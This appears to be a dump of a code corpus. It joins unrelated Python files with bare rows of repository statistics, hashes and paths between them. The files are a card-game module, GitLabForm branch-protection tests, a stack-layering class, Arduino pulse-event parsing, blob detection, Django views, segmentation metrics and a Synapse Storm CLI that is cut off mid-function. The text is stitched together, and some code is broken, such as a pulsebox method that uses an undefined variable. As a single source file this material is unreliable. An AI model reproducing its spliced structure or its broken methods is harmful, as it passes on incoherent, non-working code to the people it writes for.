class LocationKind(util.AutoNumberEnum):
"""
Enumerated kinds of locations.
Attributes:
sun
moon
key
"""
sun = ()
moon = ()
key = ()
def _can_obtain_door(content):
"""
Check if the explored cards can obtain a door.
"""
last_card = content.explored[-1]
same_count = 0
for card in reversed(content.explored):
if last_card.color == card.color:
same_count += 1
else:
break
return same_count % 3 == 0
class _Location(ColorCard):
"""Location card without special effect."""
def __init__(self, color, kind=None):
super().__init__(color)
if kind is not None:
self._kind = kind
def _class_name(self):
return "{} location".format(self._kind.name)
def _do_drawn(self, core):
core.content.hand.append(self)
def _do_play(self, core):
observer = core.observer
content = core.content
if content.explored and content.explored[-1].kind == self.kind:
raise exception.ConsecutiveSameKind
content.explored.append(self)
content.hand.remove(self)
if _can_obtain_door(content):
observer.on_door_obtained_by_explore(core.content)
color = content.explored[-1].color
card = content.piles.pull_door(color)
if card is not None:
content.opened.append(card)
if len(content.opened) == 8:
raise exception.Win
def _on_discard(self, core):
"""
Do additional operations after discard a card from hand to discarded
pile.
"""
pass
def _do_discard(self, core):
content = core.content
content.hand.remove(self)
content.piles.put_discard(self)
self._on_discard(core)
def sun(color):
"""
Make a sun location card with specific color.
Args:
color (Color): The specific color.
Returns:
Card: A sun location card.
"""
return _Location(color, LocationKind.sun)
def moon(color):
"""
Make a moon location card with specific color.
Args:
color (Color): The specific color.
Returns:
Card: A moon location card.
"""
return _Location(color, LocationKind.moon)
class _KeyLocation(_Location):
"""
Key location card implementation.
"""
_kind = LocationKind.key
def _on_discard(self, core):
actor = core.actor
content = core.content
drawn = content.piles.draw(5)
discarded_idx, back_idxes = actor.key_discard_react(core.content, drawn)
LOGGER.info(
"Agent choose key discard react %s, %s",
discarded_idx,
back_idxes)
# TODO check returned value
content.piles.put_discard(drawn[discarded_idx])
content.piles.put_undrawn_iter(drawn[idx] for idx in back_idxes)
def key(color):
"""
Make a key location card with specific color.
Args:
color (Color): The specific color.
Returns:
Card: A key location card.
"""
return _KeyLocation(color)
| 23.055172
| 80
| 0.606342
| 393
| 3,343
| 4.994911
| 0.284987
| 0.048905
| 0.024452
| 0.036679
| 0.172695
| 0.152318
| 0.108507
| 0.108507
| 0.108507
| 0.108507
| 0
| 0.003845
| 0.299731
| 3,343
| 144
| 81
| 23.215278
| 0.834686
| 0.211188
| 0
| 0.102941
| 0
| 0
| 0.019664
| 0
| 0
| 0
| 0
| 0.006944
| 0
| 1
| 0.161765
| false
| 0.014706
| 0.058824
| 0.014706
| 0.397059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1ccfab0d2faebbdb592b40f848ee1bf3127a09c
| 4,247
|
py
|
Python
|
gitlabform/gitlabform/test/test_branches.py
|
rbartuzel/gitlabform
|
4027ef4d6bbbef7313ed6fcf07cef8fd1ad76d18
|
[
"MIT"
] | null | null | null |
gitlabform/gitlabform/test/test_branches.py
|
rbartuzel/gitlabform
|
4027ef4d6bbbef7313ed6fcf07cef8fd1ad76d18
|
[
"MIT"
] | null | null | null |
gitlabform/gitlabform/test/test_branches.py
|
rbartuzel/gitlabform
|
4027ef4d6bbbef7313ed6fcf07cef8fd1ad76d18
|
[
"MIT"
] | null | null | null |
import pytest
from gitlabform.gitlabform import GitLabForm
from gitlabform.gitlabform.test import create_group, create_project_in_group, get_gitlab, create_readme_in_project, \
GROUP_NAME
PROJECT_NAME = 'branches_project'
GROUP_AND_PROJECT_NAME = GROUP_NAME + '/' + PROJECT_NAME
@pytest.fixture(scope="module")
def gitlab(request):
gl = get_gitlab()
create_group(GROUP_NAME)
create_project_in_group(GROUP_NAME, PROJECT_NAME)
create_readme_in_project(GROUP_AND_PROJECT_NAME) # in master branch
branches = ['protect_branch_but_allow_all', 'protect_branch_and_disallow_all',
'protect_branch_and_allow_merges', 'protect_branch_and_allow_pushes']
for branch in branches:
gl.create_branch(GROUP_AND_PROJECT_NAME, branch, 'master')
def fin():
# delete all created branches
for branch_to_delete in branches:
gl.delete_branch(GROUP_AND_PROJECT_NAME, branch_to_delete)
request.addfinalizer(fin)
return gl # provide fixture value
protect_branch_but_allow_all = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_but_allow_all:
protected: true
developers_can_push: true
developers_can_merge: true
"""
protect_branch_and_disallow_all = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_disallow_all:
protected: true
developers_can_push: false
developers_can_merge: false
"""
mixed_config = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges:
protected: true
developers_can_push: false
developers_can_merge: true
protect_branch_and_allow_pushes:
protected: true
developers_can_push: true
developers_can_merge: false
"""
unprotect_branches = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges:
protected: false
protect_branch_and_allow_pushes:
protected: false
"""
class TestBranches:
def test__protect_branch_but_allow_all(self, gitlab):
gf = GitLabForm(config_string=protect_branch_but_allow_all,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_but_allow_all')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is True
def test__protect_branch_and_disallow_all(self, gitlab):
gf = GitLabForm(config_string=protect_branch_and_disallow_all,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_disallow_all')
assert branch['protected'] is True
assert branch['developers_can_push'] is False
assert branch['developers_can_merge'] is False
def test__mixed_config(self, gitlab):
gf = GitLabForm(config_string=mixed_config,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges')
assert branch['protected'] is True
assert branch['developers_can_push'] is False
assert branch['developers_can_merge'] is True
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is False
gf = GitLabForm(config_string=unprotect_branches,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges')
assert branch['protected'] is False
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes')
assert branch['protected'] is False
| 31.227941
| 117
| 0.721215
| 527
| 4,247
| 5.354839
| 0.119545
| 0.101347
| 0.090716
| 0.094259
| 0.788094
| 0.681786
| 0.614812
| 0.594259
| 0.594259
| 0.487597
| 0
| 0.001192
| 0.210031
| 4,247
| 135
| 118
| 31.459259
| 0.83994
| 0.01554
| 0
| 0.647619
| 0
| 0
| 0.384965
| 0.176442
| 0
| 0
| 0
| 0
| 0.133333
| 1
| 0.047619
| false
| 0
| 0.028571
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1cdf2cb5f5f7dc477b7b2cf95774b2b25e88788
| 2,543
|
py
|
Python
|
bespin/layers.py
|
delfick/bespin
|
4fa21875f0cdc32a70b33cdc90ce5196c0a2cbcd
|
[
"MIT"
] | 5
|
2017-04-05T00:46:41.000Z
|
2017-11-09T01:21:44.000Z
|
bespin/layers.py
|
delfick/bespin
|
4fa21875f0cdc32a70b33cdc90ce5196c0a2cbcd
|
[
"MIT"
] | 69
|
2016-10-11T04:40:09.000Z
|
2022-01-12T23:57:27.000Z
|
bespin/layers.py
|
delfick/bespin
|
4fa21875f0cdc32a70b33cdc90ce5196c0a2cbcd
|
[
"MIT"
] | 7
|
2016-10-11T04:32:21.000Z
|
2017-12-18T05:59:17.000Z
|
from bespin.errors import StackDepCycle
class Layers(object):
"""
Used to order the creation of many stacks.
Usage::
layers = Layers({"stack1": stack1, "stack2": "stack2, "stack3": stack3, "stack4": stack4})
layers.add_to_layers("stack3")
for layer in layers.layered:
# might get something like
# [("stack3", stack4), ("stack2", stack2)]
# [("stack3", stack3)]
When we create the layers, it will do a depth first addition of all dependencies
and only add a stack to a layer that occurs after all it's dependencies.
Cyclic dependencies will be complained about.
"""
def __init__(self, stacks, all_stacks=None):
self.stacks = stacks
self.all_stacks = all_stacks
if self.all_stacks is None:
self.all_stacks = stacks
self.accounted = {}
self._layered = []
def reset(self):
"""Make a clean slate (initialize layered and accounted on the instance)"""
self.accounted = {}
self._layered = []
@property
def layered(self):
"""Yield list of [[(name, stack), ...], [(name, stack), ...], ...]"""
result = []
for layer in self._layered:
nxt = []
for name in layer:
nxt.append((name, self.all_stacks[name]))
result.append(nxt)
return result
def add_all_to_layers(self):
"""Add all the stacks to layered"""
for stack in sorted(self.stacks):
self.add_to_layers(stack)
def add_to_layers(self, name, chain=None):
layered = self._layered
if name not in self.accounted:
self.accounted[name] = True
else:
return
if chain is None:
chain = []
chain = chain + [name]
for dependency in sorted(self.all_stacks[name].dependencies(self.all_stacks)):
dep_chain = list(chain)
if dependency in chain:
dep_chain.append(dependency)
raise StackDepCycle(chain=dep_chain)
self.add_to_layers(dependency, dep_chain)
layer = 0
for dependency in self.all_stacks[name].dependencies(self.all_stacks):
for index, deps in enumerate(layered):
if dependency in deps:
if layer <= index:
layer = index + 1
continue
if len(layered) == layer:
layered.append([])
layered[layer].append(name)
| 31.012195
| 98
| 0.563508
| 294
| 2,543
| 4.761905
| 0.306122
| 0.064286
| 0.074286
| 0.036429
| 0.06
| 0.06
| 0.06
| 0.06
| 0
| 0
| 0
| 0.01003
| 0.333464
| 2,543
| 81
| 99
| 31.395062
| 0.815929
| 0.274479
| 0
| 0.081633
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.102041
| false
| 0
| 0.020408
| 0
| 0.183673
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1ce356bd1c13f7cdfe09167b87b3a43fdb85c66
| 6,851
|
py
|
Python
|
src/pulsebox/events.py
|
rhosak/pulsebox
|
f2ce859ac5cd968bcd85a1e0eedf320414602a40
|
[
"MIT"
] | 3
|
2019-02-23T23:15:48.000Z
|
2020-03-23T12:33:15.000Z
|
src/pulsebox/events.py
|
rhosak/pulsebox
|
f2ce859ac5cd968bcd85a1e0eedf320414602a40
|
[
"MIT"
] | null | null | null |
src/pulsebox/events.py
|
rhosak/pulsebox
|
f2ce859ac5cd968bcd85a1e0eedf320414602a40
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""events.py
Pulse sequence events for the Arduino Due pulsebox.
Radim Hošák <hosak(at)optics.upol.cz>
2021 Quantum Optics Lab Olomouc
"""
from functools import reduce
from pulsebox.codeblocks import state_change, loop, channel_states_to_odsr
from pulsebox.config import calibration, pulsebox_pincount
class DelayEvent():
def __init__(self, time_string=None, iters=None,
duration=None, loop_suffix="0"):
if time_string:
duration = read_time(time_string)
iters = time2iters(duration)
elif duration:
iters = time2iters(duration)
elif iters:
duration = calibration * iters
codeblock = loop(iters, loop_suffix)
self.duration = duration
self.iters = iters
self.loop_suffix = loop_suffix
self.codeblock = codeblock
def from_time_string(self):
duration = read_time(time_string)
__init__(self, duration)
def __repr__(self):
return f"Delay: {self.duration} s " \
f"({self.iters} iters)"
class StateChangeEvent():
def __init__(self, channel_states):
odsr = channel_states_to_odsr(channel_states)
codeblock = state_change(odsr_value=odsr)
self.channel_states = channel_states
self.odsr = odsr
self.codeblock = codeblock
def __repr__(self):
# msg = "Pulsebox state change: \n"
msg = "State change: "
for channel, state in enumerate(self.channel_states):
msg += f"{state}"
if channel % 4 == 3 and (channel + 1) < pulsebox_pincount:
msg +="."
# msg += f"\tCH{channel}: {state}"
msg += f" ({self.odsr})"
return msg
class PulseEvent():
def __init__(self, channel, timestamp, duration):
self.channel = channel
self.timestamp = timestamp
self.duration = duration
self.flips = [FlipEvent(channel, timestamp=timestamp),
FlipEvent(channel, timestamp=(timestamp+duration))]
def __repr__(self):
return f"Pulse on channel {self.channel} - " \
f"start: {self.timestamp} s, duration: {self.duration} s"
class FlipEvent():
"""The fundamental channel flip event.
User pulse sequence input is transformed into a sequence
of pulsebox channel flips.
"""
def __init__(self, channel, time_string=None, timestamp=None):
if not timestamp:
if not time_string:
raise ValueError("Neither time string nor timestamp given.")
timestamp = read_time(time_string)
self.channel = channel
self.timestamp = timestamp
def __repr__(self):
return f"Channel {self.channel} flip at {self.timestamp} s"
def read_time(time_string):
"""Calculate time from a string containing a number and a time unit.
The unit is denoted by the last character of `time_string`. Time is
calculated by multiplying the 'number part' of `time_string` by a factor
corresponding to the unit.
The following units are accepted:
* n: nanoseconds (factor = 1e-9)
* u: microseconds (1e-6)
* m: milliseconds (1e-3)
* s: seconds (1)
* TODO: c: MCU clock cycles (12e-9)
* TODO: i: delay loop iterations (see `calibration` in config.ini)
Args:
* time_string (str): The (number + unit) string, for example "1m"
Returns:
* float time: Time (in seconds).
"""
factors = {
"n": 1e-9,
"u": 1e-6,
"m": 1e-3,
"s": 1
}
# Check that the time string is properly formatted, e. g. time part
# is followed by the unit part. The string should contain at least two
# character, otherwise splitting it into two parts will raise an IndexError.
try:
number, unit = time_string[:-1], time_string[-1]
except (IndexError, TypeError):
raise ValueError("Invalid time string given.")
# If the 'time part' cannot be converted to float, this raises a ValueError.
number = float(number)
if number < 0:
raise ValueError("Negative time values are not allowed.")
# Check that a valid time unit was specified. If no unit was specified,
# then what we call 'unit' will in fact be the last digit of the time value
# and as we do not use numeric unit symbols, we still get an error.
try:
factor = factors[unit]
except KeyError:
raise ValueError("Invalid time unit given.")
time = number * factor
return time
def time2iters(time):
"""Get the number of loop iterations required to achieve a given time delay.
Args:
* time (float): The time to convert to the number of delay loop iters.
Returns:
* int iters: The number of iterations through the ASM delay loop
required to produce a delay of a given length.
Notes:
The possible delay times are discrete, with a step given by the
structure of the ASM loop. This step is given by the `calibration`
variable in the config.
For example, if our delays for 1, 2, and 3 delay loop iterations are
50 ns, 100 ns, and 150 ns, respectively, and we want to convert
120 ns to delay loop iterations, we would see that 2.4 iterations are
required. As this is impossible, we round this to the nearest integer
amount of iterations. In this case, that's 2 iterations and instead of
120 ns delay we produced a 100 ns delay.
"""
if time < 0:
raise ValueError("Negative time is not allowed.")
iters = int(round(time / calibration))
return iters
def parse_events(event_string, channel=None):
"""Convert a long string of events into an array of event instances.
"""
event_substrings = event_string.split(" ")
events = []
for substring in event_substrings:
try:
event_type, event_params = substring[0], substring[1:]
except (IndexError, ValueError):
print(f"CH {channel} - Invalid event string: " \
f"{event_string.__repr__()}")
return events
if event_type.lower() == "p": # PulseEvent
# Pulse event contains two timestrings - start and duration.
# Separate them.
timestamp, duration = None, None
for n, ch in enumerate(event_params):
if ch.isalpha():
timestamp = read_time(event_params[:n+1])
duration = read_time(event_params[n+1:])
break
pe = PulseEvent(channel, timestamp, duration)
new_events = pe.flips
for event in new_events:
events.append(event)
return events
| 34.084577
| 80
| 0.618888
| 866
| 6,851
| 4.786374
| 0.284065
| 0.041013
| 0.010615
| 0.01737
| 0.072376
| 0.041978
| 0
| 0
| 0
| 0
| 0
| 0.01285
| 0.295723
| 6,851
| 200
| 81
| 34.255
| 0.846218
| 0.3671
| 0
| 0.198113
| 0
| 0
| 0.107186
| 0.006049
| 0
| 0
| 0
| 0.01
| 0
| 1
| 0.113208
| false
| 0
| 0.028302
| 0.028302
| 0.254717
| 0.009434
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1d2400def017bc7e08b7a2881ecb907828aa29c
| 1,839
|
py
|
Python
|
saber/postprocessing/blob_detect/blob_detect.py
|
elenimath/saber
|
71acab9798cf3aee1c4d64b09453e5234f8fdf1e
|
[
"Apache-2.0"
] | 12
|
2018-05-14T17:43:18.000Z
|
2021-11-16T04:03:33.000Z
|
saber/postprocessing/blob_detect/blob_detect.py
|
elenimath/saber
|
71acab9798cf3aee1c4d64b09453e5234f8fdf1e
|
[
"Apache-2.0"
] | 34
|
2019-05-06T19:13:36.000Z
|
2021-05-06T19:12:35.000Z
|
saber/postprocessing/blob_detect/blob_detect.py
|
elenimath/saber
|
71acab9798cf3aee1c4d64b09453e5234f8fdf1e
|
[
"Apache-2.0"
] | 3
|
2019-10-08T17:42:17.000Z
|
2021-07-28T05:52:02.000Z
|
# Copyright 2020 The Johns Hopkins University Applied Physics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from skimage.measure import label, regionprops
import argparse
def get_parser():
parser = argparse.ArgumentParser(description="Blob Detect Tool")
parser.set_defaults(func=lambda _: parser.print_help())
parser.add_argument("-i", "--input", required=True, help="Input numpy array file")
parser.add_argument(
"--min", required=True, help="minimum area for region to be counted"
)
parser.add_argument(
"--max", required=True, help="maximum area for region to be counted"
)
parser.add_argument("-o", "--outfile", required=True, help="Output file")
return parser
def blob_detect(dense_map, min, max):
labels = label(dense_map)
regions = regionprops(labels)
output = np.empty((0, dense_map.ndim))
for props in regions:
if props.area >= float(min) and props.area <= float(max):
output = np.concatenate((output, [props.centroid]), axis=0)
return output
def main():
parser = get_parser()
args = parser.parse_args()
input_array = np.load(args.input)
output_array = blob_detect(input_array, min=args.min, max=args.max)
np.save(args.outfile, output_array)
if __name__ == "__main__":
main()
| 34.055556
| 86
| 0.707993
| 259
| 1,839
| 4.92278
| 0.486486
| 0.047059
| 0.053333
| 0.025098
| 0.064314
| 0.064314
| 0.064314
| 0.064314
| 0.064314
| 0
| 0
| 0.006676
| 0.185427
| 1,839
| 53
| 87
| 34.698113
| 0.844459
| 0.32137
| 0
| 0.064516
| 0
| 0
| 0.13047
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.096774
| 0
| 0.258065
| 0.032258
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1d3dc26cb6e1253349d57f3b6bf5b06931d5da6
| 774
|
py
|
Python
|
forms_app/views.py
|
sudee404/forms_project
|
ba60e41d13d72c80f412a7928e32000db200ea17
|
[
"Apache-2.0"
] | null | null | null |
forms_app/views.py
|
sudee404/forms_project
|
ba60e41d13d72c80f412a7928e32000db200ea17
|
[
"Apache-2.0"
] | null | null | null |
forms_app/views.py
|
sudee404/forms_project
|
ba60e41d13d72c80f412a7928e32000db200ea17
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
from .models import User
from . import forms
# Create your views here.
def index(request):
context = {
'django':'The Web Framework for Developers with a deadline'
}
return render(request,'index.html', context=context)
def signup(request):
sign_up = forms.UserForm()
if request.method == "POST":
sign_up = forms.UserForm(request.POST)
if sign_up.is_valid():
sign_up.save(commit=True)
return index(request)
data = {
'form':sign_up,
}
return render(request,'signup.html',context=data)
def userlist(request):
users = User.objects.order_by('name')
data = {
'users':users,
}
return render(request,'userlist.html',context = data)
| 26.689655
| 67
| 0.639535
| 96
| 774
| 5.083333
| 0.479167
| 0.061475
| 0.116803
| 0.077869
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.241602
| 774
| 29
| 68
| 26.689655
| 0.831346
| 0.029716
| 0
| 0.08
| 0
| 0
| 0.14
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12
| false
| 0
| 0.12
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1d9fe63dcda29a6aafbbbb348278fbcaa1eb8c3
| 3,449
|
py
|
Python
|
metrics.py
|
mksarker/data_preprocessing
|
dabdb7f3dbf1c4bf5ee49a39aef2cb258539b027
|
[
"MIT"
] | null | null | null |
metrics.py
|
mksarker/data_preprocessing
|
dabdb7f3dbf1c4bf5ee49a39aef2cb258539b027
|
[
"MIT"
] | null | null | null |
metrics.py
|
mksarker/data_preprocessing
|
dabdb7f3dbf1c4bf5ee49a39aef2cb258539b027
|
[
"MIT"
] | null | null | null |
import os
import argparse
import logging
import numpy as np
import SimpleITK as sitk
logging.basicConfig(level=logging.INFO)
from tqdm import tqdm
import cv2
import sys
from PIL import Image
from sklearn import metrics
def Accuracy(y_true, y_pred):
TP = np.sum(np.logical_and(y_pred == 255, y_true == 255))
TN = np.sum(np.logical_and(y_pred == 0, y_true == 0))
FP = np.sum(np.logical_and(y_pred == 255, y_true == 0))
FN = np.sum(np.logical_and(y_pred == 0, y_true == 255))
accuracy = (TP + TN)/float(TP + TN + FP + FN)
return accuracy
def Dice(y_true, y_pred):
"""Returns Dice Similarity Coefficient for ground truth and predicted masks."""
#print(y_true.dtype)
#print(y_pred.dtype)
y_true = np.squeeze(y_true)/255
y_pred = np.squeeze(y_pred)/255
y_true.astype('bool')
y_pred.astype('bool')
intersection = np.logical_and(y_true, y_pred).sum()
return ((2. * intersection.sum()) + 1.) / (y_true.sum() + y_pred.sum() + 1.)
def IoU(Gi,Si):
#print(Gi.shape, Si.shape)
Gi = np.squeeze(Gi)/255
Si = np.squeeze(Si)/255
Gi.astype('bool')
Si.astype('bool')
intersect = 1.0*np.sum(np.logical_and(Gi,Si))
union = 1.0*np.sum(np.logical_or(Gi,Si))
return intersect/union
def Sensitivity(y_true, y_pred):
TP = np.sum(np.logical_and(y_pred == 255, y_true == 255))
TN = np.sum(np.logical_and(y_pred == 0, y_true == 0))
FP = np.sum(np.logical_and(y_pred == 255, y_true == 0))
FN = np.sum(np.logical_and(y_pred == 0, y_true == 255))
sensitivity = TP/float(TP + FN)
return sensitivity
def Specificity(y_true, y_pred):
TP = np.sum(np.logical_and(y_pred == 255, y_true == 255))
TN = np.sum(np.logical_and(y_pred == 0, y_true == 0))
FP = np.sum(np.logical_and(y_pred == 255, y_true == 0))
FN = np.sum(np.logical_and(y_pred == 0, y_true == 255))
specificity = TN/float(TN+FP)
return specificity
def main():
parser = argparse.ArgumentParser(description='ELM line segmentation')
parser.add_argument('--label_dir', type=str, default='/home/vivek/Music/demo/stack/seg',
help='folder of test label')
parser.add_argument('--pred_dir', type=str, default='/home/vivek/Music/demo/stack/pred',
help='folder of pred masks')
args = parser.parse_args()
labels = [os.path.join(args.label_dir, x) for x in os.listdir(os.path.join(args.label_dir)) if 'raw' not in x]
preds = [os.path.join(args.pred_dir, x) for x in os.listdir(os.path.join(args.pred_dir)) if 'raw' not in x]
mean_dice = []
mean_iou = []
mean_sensitivity = []
mean_specificity = []
mean_accuracy = []
for l, p in zip(labels, preds):
logging.info("Process %s and %s" % (p, l))
G = sitk.GetArrayFromImage(sitk.ReadImage(l))
S = sitk.GetArrayFromImage(sitk.ReadImage(p))
mean_accuracy.append(Accuracy(G, S))
mean_dice.append(Dice(G, S))
mean_iou.append(IoU(G, S))
mean_sensitivity.append(Sensitivity(G, S))
mean_specificity.append(Specificity(G, S))
print ('Mean_Accuracy = ', np.mean(np.array(mean_accuracy)))
print ('Mean_Dice = ', np.mean(np.array(mean_dice)))
print ('Mean_IoU = ', np.mean(np.array(mean_iou)))
print ('Mean_Sensitivity = ', np.mean(np.array(mean_sensitivity)))
print ('Mean_Specificity = ', np.mean(np.array(mean_specificity)))
if __name__ == '__main__':
main()
| 35.556701
| 114
| 0.643665
| 551
| 3,449
| 3.854809
| 0.199637
| 0.051789
| 0.046139
| 0.092279
| 0.366761
| 0.319209
| 0.269303
| 0.269303
| 0.269303
| 0.231638
| 0
| 0.02462
| 0.199188
| 3,449
| 96
| 115
| 35.927083
| 0.744388
| 0.039722
| 0
| 0.155844
| 0
| 0
| 0.082022
| 0.019673
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077922
| false
| 0
| 0.12987
| 0
| 0.272727
| 0.064935
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1dc37b00019bdcd4fd7800d93e149be0dfe2bdf
| 11,747
|
py
|
Python
|
synapse/tools/storm.py
|
vertexproject/synapse
|
9712e2aee63914441c59ce6cfc060fe06a2e5920
|
[
"Apache-2.0"
] | 216
|
2017-01-17T18:52:50.000Z
|
2022-03-31T18:44:49.000Z
|
synapse/tools/storm.py
|
vertexproject/synapse
|
9712e2aee63914441c59ce6cfc060fe06a2e5920
|
[
"Apache-2.0"
] | 2,189
|
2017-01-17T22:31:48.000Z
|
2022-03-31T20:41:45.000Z
|
synapse/tools/storm.py
|
vertexproject/synapse
|
9712e2aee63914441c59ce6cfc060fe06a2e5920
|
[
"Apache-2.0"
] | 44
|
2017-01-17T16:50:57.000Z
|
2022-03-16T18:35:52.000Z
|
import os
import sys
import copy
import asyncio
import logging
import argparse
import synapse.exc as s_exc
import synapse.common as s_common
import synapse.telepath as s_telepath
import synapse.lib.cli as s_cli
import synapse.lib.cmd as s_cmd
import synapse.lib.node as s_node
import synapse.lib.time as s_time
import synapse.lib.output as s_output
import synapse.lib.parser as s_parser
import synapse.lib.msgpack as s_msgpack
logger = logging.getLogger(__name__)
ERROR_COLOR = '#ff0066'
WARNING_COLOR = '#f4e842'
NODEEDIT_COLOR = "lightblue"
welcome = '''
Welcome to the Storm interpreter!
Local interpreter (non-storm) commands may be executed with a ! prefix:
Use !quit to exit.
Use !help to see local interpreter commands.
'''
class QuitCmd(s_cli.CmdQuit):
'''
Quit the current command line interpreter.
Example:
!quit
'''
_cmd_name = '!quit'
class HelpCmd(s_cli.CmdHelp):
'''
List interpreter extended commands and display help output.
Example:
!help foocmd
'''
_cmd_name = '!help'
class StormCliCmd(s_cli.Cmd):
# cut the Cmd instance over to using argparser and cmdrargv split
def getArgParser(self):
desc = self.getCmdDoc()
pars = s_cmd.Parser(prog=self._cmd_name, description=desc, outp=self._cmd_cli.outp)
return pars
def getCmdOpts(self, text):
pars = self.getArgParser()
argv = s_parser.Parser(text).cmdrargs()
return pars.parse_args(argv[1:])
class RunFileCmd(StormCliCmd):
'''
Run a local storm file.
Example:
!runfile /path/to/file.storm
'''
_cmd_name = '!runfile'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('stormfile', help='A local file containing a storm query.')
return pars
async def runCmdOpts(self, opts):
if not os.path.isfile(opts.stormfile):
self.printf(f'no such file: {opts.stormfile}')
return
with open(opts.stormfile, 'rb') as fd:
text = fd.read().decode()
self.printf(f'running storm file: {opts.stormfile}')
await self._cmd_cli.storm(text)
class PushFileCmd(StormCliCmd):
'''
Upload a file and create a file:bytes node.
Example:
!pushfile /path/to/file
'''
_cmd_name = '!pushfile'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('filepath', help='A local file to push to the Cortex.')
return pars
async def runCmdOpts(self, opts):
if not os.path.isfile(opts.filepath):
self.printf(f'no such file: {opts.filepath}')
return
self.printf(f'uploading file: {opts.filepath}')
async with await self._cmd_cli.item.getAxonUpload() as upload:
with open(opts.filepath, 'rb') as fd:
byts = fd.read(10000000)
while byts:
await upload.write(byts)
byts = fd.read(10000000)
size, sha256 = await upload.save()
opts = {'vars': {
'sha256': s_common.ehex(sha256),
'name': os.path.basename(opts.filepath),
}}
await self._cmd_cli.storm('[ file:bytes=$sha256 ] { -:name [:name=$name] }', opts=opts)
class PullFileCmd(StormCliCmd):
'''
Download a file by sha256 and store it locally.
Example:
!pullfile c00adfcc316f8b00772cdbce2505b9ea539d74f42861801eceb1017a44344ed3 /path/to/savefile
'''
_cmd_name = '!pullfile'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('sha256', help='The SHA256 of the file to download.')
pars.add_argument('filepath', help='The file path to save the downloaded file to.')
return pars
async def runCmdOpts(self, opts):
self.printf(f'downloading sha256: {opts.sha256}')
try:
with s_common.genfile(opts.filepath) as fd:
